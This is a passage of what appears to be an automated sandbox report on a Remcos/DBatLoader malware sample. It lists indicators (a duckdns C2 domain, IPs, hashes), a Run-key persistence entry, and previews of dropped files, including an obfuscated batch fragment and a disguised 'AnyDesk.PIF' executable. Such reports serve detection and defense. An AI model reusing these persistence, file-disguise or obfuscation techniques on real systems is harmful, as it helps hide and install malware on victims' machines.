                                                                  07:53:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Faogvkgh C:\Users\Public\Faogvkgh.url

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  178.237.33.50globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  file.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • geoplugin.net/json.gp
                                                                  FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                  • geoplugin.net/json.gp
                                                                  ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • geoplugin.net/json.gp
                                                                  download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                  • geoplugin.net/json.gp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  iamblessed.duckdns.orgzYJYK66EGb.exeGet hashmaliciousRemcosBrowse
                                                                  • 103.186.116.195
                                                                  geoplugin.netglobe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  file.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                  • 178.237.33.50

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  UNIFIEDLAYER-AS-1USNew Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                  • 108.179.253.197
                                                                  arm7.nn-20241120-0508.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 162.144.165.86
                                                                  http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
                                                                  • 50.116.87.139
                                                                  http://volunteeraudio.comGet hashmaliciousUnknownBrowse
                                                                  • 162.144.112.69
                                                                  https://t.ly/9nPygGet hashmaliciousUnknownBrowse
                                                                  • 192.254.189.167
                                                                  Gherrera_Revised_Record_Adjustment_Antamina_Required_Signature.docx.docGet hashmaliciousUnknownBrowse
                                                                  • 162.241.225.120
                                                                  https://docsend.com/view/8bzvs74qq8k89vmwGet hashmaliciousUnknownBrowse
                                                                  • 162.241.60.177
                                                                  https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20thoughGet hashmaliciousUnknownBrowse
                                                                  • 108.167.158.52
                                                                  http://palmbeachhydroflight.com/Get hashmaliciousUnknownBrowse
                                                                  • 162.241.224.56
                                                                  file.exeGet hashmaliciousRemcosBrowse
                                                                  • 69.49.234.173
                                                                  INFOBOX-ASInfoboxruAutonomousSystemRUYDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                  • 109.120.138.54
                                                                  cDRgXaadjD.exeGet hashmaliciousSilverRatBrowse
                                                                  • 109.120.138.220
                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 92.243.83.22
                                                                  boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 77.221.151.63
                                                                  ATOM86-ASATOM86NLglobe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  file.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                  • 178.237.33.50

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\Public\alpha.exeZiraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                      #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse
                                                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          TZH3Uk8x45.batGet hashmaliciousDBatLoader, PureLog Stealer, XWormBrowse
                                                                            Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                                                              FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                rPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                  Contact Form and Delivery Details ,pdf.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    Duclot Collections.batGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\Public\AnyDesk.jpeg

                                                                                      Download File
                                                                                      Process:C:\Users\Public\kn.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2453506
                                                                                      Entropy (8bit):3.938076976548238
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:qY0nR4W5uffud/O4YVZnLfT8NI1dMPKLcAuaX3DucoDZxTM404oE4AeBIkFZy1zv:W
                                                                                      MD5:F4D3D158E042B2F2F6241C94DA2370FB
                                                                                      SHA1:0228ECE140A699A52E806AD7A977ED2A1198035E
                                                                                      SHA-256:28CD0F0300EB2AFA9B4AB00193F0D5868CA091E361E4853CC48EC225B1A87E17
                                                                                      SHA-512:A97FFFA538DF6C53B2E3C7F594BB46FBDFBC213EACF86BDED4D4080FAC0CA4EEA7EC1CCC6DDBE6037F65F8F1138AD296E1112E48A3074F29564AF7E447DDFE9E
                                                                                      Malicious:false
                                                                                      Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900ca050000ea0c000000000054e705000010000000f005000000400000100000000200000400000000000000040000000000000000501300000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000e00600ba25000000a0070000ae0b000000000000000000000000000000000000300700c86700000000000000000000000000000000000000000000000000000020070018000000000000000000000000000000000000000ce70600e00500000000000000000000000000000000000000000000

                                                                                      C:\Users\Public\Faogvkgh.url

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Faogvkgh.PIF">), ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):104
                                                                                      Entropy (8bit):5.189522142085639
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMcKmYjSsbxUcy49Svn:HRYFVmTWDyzOcExUcbcn
                                                                                      MD5:C37272C81C94DBD1EA2F5546FF4FBA8F
                                                                                      SHA1:1656F74833690F14275BC46513B225FE9639CA21
                                                                                      SHA-256:9D2280D9A822D4B78DFAFBAF35A25369AE68F85432DB3867B8AD2925A32FC338
                                                                                      SHA-512:9034F8B6C245334D2B48C83A65DA5E0FA2A9B97FEB96ACEC5FADF2BC2D975ED11F19CAF918A78F802A43E89CD370EEA2A3A6366884C48136E25361C6582DD2FF
                                                                                      Malicious:true
                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Faogvkgh.PIF"..IconIndex=965449..HotKey=71..

                                                                                      C:\Users\Public\Libraries\AnyDesk.PIF

                                                                                      Download File
                                                                                      Process:C:\Users\Public\kn.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1226752
                                                                                      Entropy (8bit):7.459058108073001
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:KdKnJlmwhG7vohKM4br2Qza6HR2zlPQxL/F99UljJes8lSnQ:KCl7kYOLSes8lSQ
                                                                                      MD5:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                      SHA1:3D26F65C19079BEA772572E3367B4185AA4C99CA
                                                                                      SHA-256:43223D630E7D3898D254EAF0C02264261ADA01C3ED93FC119C6550E66F406A5B
                                                                                      SHA-512:4065E8C1072B89B6D741F8268DE54DDB5521ACAD91FB13491FC1E1ED75467E753764501E201336C67CD7871B0774B835222C53E9F29DDF4CA72DAC0D37F5F163
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................

                                                                                      C:\Users\Public\Libraries\Faogvkgh

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):826131
                                                                                      Entropy (8bit):7.140714548437426
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:RaXfzec661p3tuPkVCYvGG1zoHZB3lf+r8O0/LX0qRvHxNnrpEGOFz9cWVAfGWYZ:MXCgp3tzcYoblmazk8RIFBe+Z
                                                                                      MD5:A6B6F0A1C8B5A070E907187DF8E5C944
                                                                                      SHA1:A44F9EAC625D78D04F0A5FAF78C8F41DFF0C0D1D
                                                                                      SHA-256:5AFE8919315B326B9BD21F61CDD7AF5DB8222A721BD6020460E94ECF726B6E5A
                                                                                      SHA-512:E8743932C8B183E5E40512301F3D069919389DD460114D65D30253F9C3A73AD7C656C6003CB63D3CB85A16F44FFE4F6A2FF52E05FB61757C6C1D533A10837449
                                                                                      Malicious:true
                                                                                      Preview:...Y#..K.... ..#...%....."........&#...#......Y#..KQ...#...#.....Y#..Ktiwrhlwelryx.:.NK..[..q..2.!....S.z{fKj..xe...c.....=.M8#..,j.-+\.4}....8.ZRelr.1....7..nZK...,T......r......mj..KI.k.....x..k..p..5_........|.Y=....:......q....C.%...-..u.+...WZ!.6...._"l....,Z.gy.pm....-..LM.RV.........i.........XVxjq.]..tqB...4.r.,h.s....7.$>../.!.;...-.....$V9..T?...?v&.*UAN(.5.).4........NelX...7S.....Y.AV.bR...9.....sw.l..~b.]..t....%j....5V.....j....G..nFY.+.8...2..l...'.5O...T..ui.4v...7...A~..=RLrvsR`....xK..z0.LzBlwe.jU.C.$$].Lb,siyHm.kGg..Qsr.$.OX.Ks...v;$7..z.....zc}.Wt.m....wr.s....G).j{.P[..6..q.T.7...Z..&.ZrRa.]...O.x..<.bN...j.H.TX.'.Ar_.'..QW..F~e6. .5..1.... .F.7...?...1.[Xx..+..6.jq.J.b....$.y^p}.=..h0q..[Xx..q.xas...$?MP..MAK..r.V{.....xYi.wM...E|:..uB...8v7.. =ZY.'.Au...M.KMk.qjcr...m.v.iu...!.7.jXh.O....8.g....q(.7sf.y.s...Q.esm.m..|...rhl.A0.jh.. .6...wrv4qp%jo.xeni..fwrh7.jZ..crp.;.#pu....<...smv.f.Q("xrhl.lq..&..iss5;3...6.+bes<^g...tiw.;..?.mU.qS.."..1

                                                                                      C:\Users\Public\Libraries\Faogvkgh.PIF

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1226752
                                                                                      Entropy (8bit):7.459058108073001
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:KdKnJlmwhG7vohKM4br2Qza6HR2zlPQxL/F99UljJes8lSnQ:KCl7kYOLSes8lSQ
                                                                                      MD5:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                      SHA1:3D26F65C19079BEA772572E3367B4185AA4C99CA
                                                                                      SHA-256:43223D630E7D3898D254EAF0C02264261ADA01C3ED93FC119C6550E66F406A5B
                                                                                      SHA-512:4065E8C1072B89B6D741F8268DE54DDB5521ACAD91FB13491FC1E1ED75467E753764501E201336C67CD7871B0774B835222C53E9F29DDF4CA72DAC0D37F5F163
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................

                                                                                      C:\Users\Public\Libraries\PNO

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Hyn:S
                                                                                      MD5:29637D17C846332CE12493A7842386C6
                                                                                      SHA1:D8C115B7E9D8C11534F51C5E423CED7B4C7B6777
                                                                                      SHA-256:1016D189FFD2702D5EA71FD4EF0EEA4991FE3616A56F8C784D1BBFA3C9201E14
                                                                                      SHA-512:C584E1AA1ACF89E68DA0B32EB11BB5E623975CC84651F01967E8849A1A97671F0A72F33269B35C34CDA0B2742698BA3D878DFDD2CC46B378DFD3E6EAD7FEC318
                                                                                      Malicious:false
                                                                                      Preview:57..

                                                                                      C:\Users\Public\Libraries\hgkvgoaF.cmd

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):62357
                                                                                      Entropy (8bit):4.705712327109906
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                      Malicious:false
                                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                      C:\Users\Public\alpha.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):289792
                                                                                      Entropy (8bit):6.135598950357573
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                                                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                                                      • Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
                                                                                      • Filename: Payment.cmd, Detection: malicious, Browse
                                                                                      • Filename: FACTURA.cmd, Detection: malicious, Browse
                                                                                      • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                                      • Filename: Contact Form and Delivery Details ,pdf.cmd, Detection: malicious, Browse
                                                                                      • Filename: Duclot Collections.bat, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                      C:\Users\Public\alpha.pif

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):236544
                                                                                      Entropy (8bit):6.4416694948877025
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\kn.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):1651712
                                                                                      Entropy (8bit):6.144018815244304
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                      C:\Users\Public\xpha.pif

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18944
                                                                                      Entropy (8bit):5.742964649637377
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                      MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                      SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                      SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                      SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\SndVol.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):962
                                                                                      Entropy (8bit):5.015105568788186
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                      MD5:8937B63DC0B37E949F38E7874886D999
                                                                                      SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                      SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                      SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                      Malicious:false
                                                                                      Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                      \Device\ConDrv

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):590
                                                                                      Entropy (8bit):4.639478289631588
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:qzBBVmXxTzHeSbZ7u0wxDDDDDDDDjCaY5Da3laYAV/TB8NGNd:iBB0XxTzHp7u0wQakDa1aT/t8Ny
                                                                                      MD5:C3E9AB89188392AEFD277158441EC0ED
                                                                                      SHA1:D53C1AC771827885E201BC5796613C33CB549E17
                                                                                      SHA-256:A22F17B3DDCA46ED068787D1C702FBFA27D5BC94FCF0115A111009A0ED01437F
                                                                                      SHA-512:F3B77D563ED6ACD3C979A1A863FFA8435D5D7AE19D6B03AC3DA07C62D1D6774A7AB6691C53E2FCAAF7E5B61A09D111C11C0AC1C1EAA15EDA3F8332D868F7BD07
                                                                                      Malicious:false
                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Faogvkgh.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b800 (1226752) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.140 seconds.....

                                                                                      \Device\Null

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                      Category:dropped
